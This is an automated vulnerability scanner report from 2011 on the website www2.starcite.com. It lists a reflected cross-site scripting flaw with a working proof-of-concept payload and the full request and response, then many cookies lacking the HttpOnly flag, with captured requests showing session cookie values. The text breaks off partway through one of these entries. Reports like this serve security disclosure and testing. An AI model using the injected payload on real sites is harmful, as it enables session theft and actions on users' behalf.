www2.starcite.com, XSS, Cross Site Scripting, CWe-79, CAPEC-86

XSS in www2.starcite.com | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Jan 02 08:26:56 CST 2011.



Contents

Loading

1. Cross-site scripting (reflected)

2. Cookie without HttpOnly flag set

2.1. http://www2.starcite.com/starcite/

2.2. http://www2.starcite.com/starcite

2.3. http://www2.starcite.com/starcite/Solutionvideo/form.html

2.4. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

2.5. http://www2.starcite.com/starcite/blogapi/rsd

2.6. http://www2.starcite.com/starcite/customerlogin

2.7. http://www2.starcite.com/starcite/customers

2.8. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

2.9. http://www2.starcite.com/starcite/elqNow/elqCfg.js

2.10. http://www2.starcite.com/starcite/elqNow/elqImg.js

2.11. http://www2.starcite.com/starcite/files/SIMPLIFY2.png

2.12. http://www2.starcite.com/starcite/files/Xerox_logo.gif

2.13. http://www2.starcite.com/starcite/files/garland_favicon.ico

2.14. http://www2.starcite.com/starcite/files/garland_logo.gif

2.15. http://www2.starcite.com/starcite/files/icons/uploaded_images/browser-webbased-app-_icon_sm.gif

2.16. http://www2.starcite.com/starcite/files/icons/uploaded_images/destination-direction_icon_sm.gif

2.17. http://www2.starcite.com/starcite/files/icons/uploaded_images/network-suppliers-group_icon_sm.gif

2.18. http://www2.starcite.com/starcite/files/icons/uploaded_images/support-chat-forum_icon_sm.gif

2.19. http://www2.starcite.com/starcite/files/kblog_0.jpg

2.20. http://www2.starcite.com/starcite/files/logo_2010_vuc.jpg

2.21. http://www2.starcite.com/starcite/files/nbtafoundation.gif

2.22. http://www2.starcite.com/starcite/files/partner_pfizer.gif

2.23. http://www2.starcite.com/starcite/files/what-we-do-header.jpg

2.24. http://www2.starcite.com/starcite/files/whitepapers_icon.png

2.25. http://www2.starcite.com/starcite/home

2.26. http://www2.starcite.com/starcite/images/bg_btm1.gif

2.27. http://www2.starcite.com/starcite/images/bg_midtop.gif

2.28. http://www2.starcite.com/starcite/images/bg_midtop_extension.gif

2.29. http://www2.starcite.com/starcite/images/content_left_bg.gif

2.30. http://www2.starcite.com/starcite/images/content_right_bg.gif

2.31. http://www2.starcite.com/starcite/images/left_bdr.gif

2.32. http://www2.starcite.com/starcite/images/right_bdr.gif

2.33. http://www2.starcite.com/starcite/images/separator.gif

2.34. http://www2.starcite.com/starcite/images/spacer.gif

2.35. http://www2.starcite.com/starcite/jobs

2.36. http://www2.starcite.com/starcite/locations

2.37. http://www2.starcite.com/starcite/misc/drupal.js

2.38. http://www2.starcite.com/starcite/misc/forms.css

2.39. http://www2.starcite.com/starcite/misc/jquery.js

2.40. http://www2.starcite.com/starcite/misc/jquery/functions.js

2.41. http://www2.starcite.com/starcite/misc/jquery/jquery-1.2.6.js

2.42. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

2.43. http://www2.starcite.com/starcite/misc/jquery/jquery.validate.js

2.44. http://www2.starcite.com/starcite/misc/jquery_new.js

2.45. http://www2.starcite.com/starcite/misc/reset.css

2.46. http://www2.starcite.com/starcite/modules/Suppliers_howitworks/howitworks.js

2.47. http://www2.starcite.com/starcite/modules/addregions/addregions.js

2.48. http://www2.starcite.com/starcite/modules/cck/content.css

2.49. http://www2.starcite.com/starcite/modules/cck/fieldgroup.css

2.50. http://www2.starcite.com/starcite/modules/date/date.css

2.51. http://www2.starcite.com/starcite/modules/date/date_popup/themes/timeentry.css

2.52. http://www2.starcite.com/starcite/modules/date/date_popup/themes/white.calendar.css

2.53. http://www2.starcite.com/starcite/modules/date/date_timezone/date_timezone.js

2.54. http://www2.starcite.com/starcite/modules/jstools/jquery.history_remote.pack.js

2.55. http://www2.starcite.com/starcite/modules/jstools/jstools.js

2.56. http://www2.starcite.com/starcite/modules/jstools/tabs/drupal-tabs.css

2.57. http://www2.starcite.com/starcite/modules/jstools/tabs/jquery.tabs.pack.js

2.58. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.css

2.59. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.js

2.60. http://www2.starcite.com/starcite/modules/meetings2/meetings.js

2.61. http://www2.starcite.com/starcite/modules/meetings3/meetings.js

2.62. http://www2.starcite.com/starcite/modules/meetings4/meetings.js

2.63. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

2.64. http://www2.starcite.com/starcite/modules/node/node.css

2.65. http://www2.starcite.com/starcite/modules/planners_howitworks/howitworks.js

2.66. http://www2.starcite.com/starcite/modules/supplier_products/supplier_products.js

2.67. http://www2.starcite.com/starcite/modules/system/defaults.css

2.68. http://www2.starcite.com/starcite/modules/system/system.css

2.69. http://www2.starcite.com/starcite/modules/technology_overview/technology_overview.js

2.70. http://www2.starcite.com/starcite/modules/user/user.css

2.71. http://www2.starcite.com/starcite/morronijq.js

2.72. http://www2.starcite.com/starcite/news

2.73. http://www2.starcite.com/starcite/newsandevents

2.74. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

2.75. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

2.76. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

2.77. http://www2.starcite.com/starcite/newsletters/november2010/index.html

2.78. http://www2.starcite.com/starcite/node/100

2.79. http://www2.starcite.com/starcite/node/335/445

2.80. http://www2.starcite.com/starcite/node/929

2.81. http://www2.starcite.com/starcite/planners/findtherightsolution

2.82. http://www2.starcite.com/starcite/planners/howitworks

2.83. http://www2.starcite.com/starcite/planners/meetings1-1

2.84. http://www2.starcite.com/starcite/planners/requestmoreinformation

2.85. http://www2.starcite.com/starcite/privacy

2.86. http://www2.starcite.com/starcite/resource/findresources

2.87. http://www2.starcite.com/starcite/resourcecenter/downloads/a

2.88. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

2.89. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

2.90. http://www2.starcite.com/starcite/sitemap

2.91. http://www2.starcite.com/starcite/slideshow/images/bgsmall.png

2.92. http://www2.starcite.com/starcite/slideshow/images/big-picture_r1_c1.gif

2.93. http://www2.starcite.com/starcite/slideshow/images/big-picture_r2_c1.gif

2.94. http://www2.starcite.com/starcite/slideshow/images/big-picture_r3_c1.gif

2.95. http://www2.starcite.com/starcite/slideshow/images/bpsmall.png

2.96. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_1.jpg

2.97. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_2.jpg

2.98. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_3.jpg

2.99. http://www2.starcite.com/starcite/slideshow/images/buysol.png

2.100. http://www2.starcite.com/starcite/slideshow/images/corpsol.png

2.101. http://www2.starcite.com/starcite/slideshow/images/meetings1.jpg

2.102. http://www2.starcite.com/starcite/slideshow/images/meetings2.jpg

2.103. http://www2.starcite.com/starcite/slideshow/images/meetings3a.jpg

2.104. http://www2.starcite.com/starcite/slideshow/images/meetings3b.jpg

2.105. http://www2.starcite.com/starcite/slideshow/images/meetings3c.jpg

2.106. http://www2.starcite.com/starcite/slideshow/images/rock-star_1.gif

2.107. http://www2.starcite.com/starcite/slideshow/images/rock-star_2.gif

2.108. http://www2.starcite.com/starcite/slideshow/images/rock-star_3.gif

2.109. http://www2.starcite.com/starcite/slideshow/images/rssmall.png

2.110. http://www2.starcite.com/starcite/slideshow/images/slide4small.png

2.111. http://www2.starcite.com/starcite/solutions

2.112. http://www2.starcite.com/starcite/supplier-video/index.html

2.113. http://www2.starcite.com/starcite/suppliers/howitworks

2.114. http://www2.starcite.com/starcite/themes/garland/iestyle.css

2.115. http://www2.starcite.com/starcite/themes/garland/iestyle6.css

2.116. http://www2.starcite.com/starcite/themes/garland/images/arrow_small.gif

2.117. http://www2.starcite.com/starcite/themes/garland/images/bg_image.gif

2.118. http://www2.starcite.com/starcite/themes/garland/images/block_bg.gif

2.119. http://www2.starcite.com/starcite/themes/garland/images/blue_bdr.jpg

2.120. http://www2.starcite.com/starcite/themes/garland/images/blue_lbdr.jpg

2.121. http://www2.starcite.com/starcite/themes/garland/images/blue_rbdr.jpg

2.122. http://www2.starcite.com/starcite/themes/garland/images/btn_continue.gif

2.123. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_left.jpg

2.124. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_right.jpg

2.125. http://www2.starcite.com/starcite/themes/garland/images/content_left_bg0.gif

2.126. http://www2.starcite.com/starcite/themes/garland/images/content_right_bg0.gif

2.127. http://www2.starcite.com/starcite/themes/garland/images/footer-boxleft.gif

2.128. http://www2.starcite.com/starcite/themes/garland/images/footer-boxmiddle.gif

2.129. http://www2.starcite.com/starcite/themes/garland/images/footer-boxright.gif

2.130. http://www2.starcite.com/starcite/themes/garland/images/grey_bbdr.gif

2.131. http://www2.starcite.com/starcite/themes/garland/images/grey_lbdr.gif

2.132. http://www2.starcite.com/starcite/themes/garland/images/grey_left_bbdr1.gif

2.133. http://www2.starcite.com/starcite/themes/garland/images/grey_left_tbdr.gif

2.134. http://www2.starcite.com/starcite/themes/garland/images/grey_rbdr.gif

2.135. http://www2.starcite.com/starcite/themes/garland/images/grey_right_bbdr1.gif

2.136. http://www2.starcite.com/starcite/themes/garland/images/grey_right_tbdr.gif

2.137. http://www2.starcite.com/starcite/themes/garland/images/grey_tbdr.gif

2.138. http://www2.starcite.com/starcite/themes/garland/images/header_top-ie.png

2.139. http://www2.starcite.com/starcite/themes/garland/images/href_arrow.gif

2.140. http://www2.starcite.com/starcite/themes/garland/images/left_bdr.gif

2.141. http://www2.starcite.com/starcite/themes/garland/images/link-cust-login.gif

2.142. http://www2.starcite.com/starcite/themes/garland/images/new-bg.gif

2.143. http://www2.starcite.com/starcite/themes/garland/images/right_bdr.gif

2.144. http://www2.starcite.com/starcite/themes/garland/images/secondarymenuactive.gif

2.145. http://www2.starcite.com/starcite/themes/garland/images/section_btm.gif

2.146. http://www2.starcite.com/starcite/themes/garland/images/section_btm_blue.jpg

2.147. http://www2.starcite.com/starcite/themes/garland/images/section_top.gif

2.148. http://www2.starcite.com/starcite/themes/garland/images/section_top_blue.jpg

2.149. http://www2.starcite.com/starcite/themes/garland/images/separator_top.gif

2.150. http://www2.starcite.com/starcite/themes/garland/images/site_topbg.gif

2.151. http://www2.starcite.com/starcite/themes/garland/images/spacer.gif

2.152. http://www2.starcite.com/starcite/themes/garland/images/tableftF.gif

2.153. http://www2.starcite.com/starcite/themes/garland/images/tabrightF.gif

2.154. http://www2.starcite.com/starcite/themes/garland/print.css

2.155. http://www2.starcite.com/starcite/themes/garland/promo-rotation2.css

2.156. http://www2.starcite.com/starcite/themes/garland/starcite.css

2.157. http://www2.starcite.com/starcite/themes/garland/style.css

2.158. http://www2.starcite.com/starcite/themes/garland/views-list-Newsview.css

2.159. http://www2.starcite.com/starcite/themes/garland/views-list-customersuccessview.css

2.160. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

2.161. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

2.162. http://www2.starcite.com/starcite/themes/garland/views-list-webinarview.css

2.163. http://www2.starcite.com/starcite/themes/garland/views-list-whatwedocustomersuccessview.css

2.164. http://www2.starcite.com/starcite/whatwedo/ourtechnology

2.165. http://www2.starcite.com/starcite/whatwedo/overview

2.166. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

3. Source code disclosure

3.1. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

3.2. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

3.3. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

3.4. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

3.5. http://www2.starcite.com/starcite/planners/findtherightsolution

3.6. http://www2.starcite.com/starcite/planners/howitworks

3.7. http://www2.starcite.com/starcite/planners/requestmoreinformation

3.8. http://www2.starcite.com/starcite/resource/findresources

3.9. http://www2.starcite.com/starcite/suppliers/howitworks

3.10. http://www2.starcite.com/starcite/whatwedo/ourtechnology

3.11. http://www2.starcite.com/starcite/whatwedo/overview

3.12. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

4. Cross-domain script include

4.1. http://www2.starcite.com/starcite/

4.2. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

4.3. http://www2.starcite.com/starcite/customerlogin

4.4. http://www2.starcite.com/starcite/customers

4.5. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

4.6. http://www2.starcite.com/starcite/home

4.7. http://www2.starcite.com/starcite/jobs

4.8. http://www2.starcite.com/starcite/locations

4.9. http://www2.starcite.com/starcite/misc/reset.css

4.10. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

4.11. http://www2.starcite.com/starcite/news

4.12. http://www2.starcite.com/starcite/newsandevents

4.13. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

4.14. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

4.15. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

4.16. http://www2.starcite.com/starcite/node/100

4.17. http://www2.starcite.com/starcite/node/335/445

4.18. http://www2.starcite.com/starcite/node/929

4.19. http://www2.starcite.com/starcite/planners/findtherightsolution

4.20. http://www2.starcite.com/starcite/planners/howitworks

4.21. http://www2.starcite.com/starcite/planners/meetings1-1

4.22. http://www2.starcite.com/starcite/planners/requestmoreinformation

4.23. http://www2.starcite.com/starcite/privacy

4.24. http://www2.starcite.com/starcite/resource/findresources

4.25. http://www2.starcite.com/starcite/resourcecenter/downloads/a

4.26. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

4.27. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

4.28. http://www2.starcite.com/starcite/sitemap

4.29. http://www2.starcite.com/starcite/solutions

4.30. http://www2.starcite.com/starcite/suppliers/howitworks

4.31. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

4.32. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

4.33. http://www2.starcite.com/starcite/whatwedo/ourtechnology

4.34. http://www2.starcite.com/starcite/whatwedo/overview

4.35. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

5. Email addresses disclosed

5.1. http://www2.starcite.com/starcite/

5.2. http://www2.starcite.com/starcite/customerlogin

5.3. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

5.4. http://www2.starcite.com/starcite/home

5.5. http://www2.starcite.com/starcite/locations

5.6. http://www2.starcite.com/starcite/misc/forms.css

5.7. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

5.8. http://www2.starcite.com/starcite/node/929

5.9. http://www2.starcite.com/starcite/privacy

6. HTML does not specify charset



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9154b"><img%20src%3da%20onerror%3dalert(1)>6a03df3b79 was submitted in the REST URL parameter 4. This input was echoed as 9154b"><img src=a onerror=alert(1)>6a03df3b79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b"><img%20src%3da%20onerror%3dalert(1)>6a03df3b79 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:23:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:01 GMT;path=/
Content-Length: 37080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<input name="FilePath" value="bridging-gap-mitigating-meetings-risk9154b"><img src=a onerror=alert(1)>6a03df3b79" />
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 166 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www2.starcite.com/starcite/  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...

2.2. http://www2.starcite.com/starcite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
Location: http://www2.starcite.com/starcite/
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:29 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.starcite.co
...[SNIP]...

2.3. http://www2.starcite.com/starcite/Solutionvideo/form.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/form.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/Solutionvideo/form.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:46 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 19:17:52 GMT
ETag: "29000000002dbf-60b5-47703a6b9d474"
Accept-Ranges: bytes
Content-Length: 24757
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...

2.4. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/modules/meetings1to1/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/Solutionvideo/modules/meetings1to1/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:48 GMT
Server: Apache
Last-Modified: Mon, 26 Apr 2010 20:37:10 GMT
ETag: "1000000003200-dd5-48529bdc203b0"
Accept-Ranges: bytes
Content-Length: 3541
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Starcite
...[SNIP]...

2.5. http://www2.starcite.com/starcite/blogapi/rsd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/blogapi/rsd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/blogapi/rsd HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 639
Keep-Alive: timeout=5, max=67
Connection: Keep-Alive
Content-Type: application/rsd+xml; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:52 GMT;path=/

<?xml version="1.0"?>
<rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
<service>
<engineName>Drupal</engineName>
<engineLink>http://drupal.org/</engineLink>
<homePageLin
...[SNIP]...

2.6. http://www2.starcite.com/starcite/customerlogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
